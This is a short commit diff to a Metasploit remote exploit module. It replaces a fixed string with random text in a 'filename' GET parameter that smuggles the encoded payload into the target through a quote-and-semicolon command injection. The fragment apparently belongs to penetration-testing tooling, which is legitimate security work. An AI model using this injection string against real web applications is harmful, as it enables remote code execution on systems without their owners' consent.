Random text
parent
6c3b05f1c4
commit
e483af64e4
|
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => target_uri.path,
|
||||
'method' => 'GET',
|
||||
'vars_get' => {
|
||||
'filename' => "hola\";#{payload.encoded};\"",
|
||||
'filename' => "#{Rex::Text.rand_text_alpha(4)}\";#{payload.encoded};\"",
|
||||
'stage' => '0'
|
||||
}
|
||||
})
|
||||
|
|
Loading…
Reference in New Issue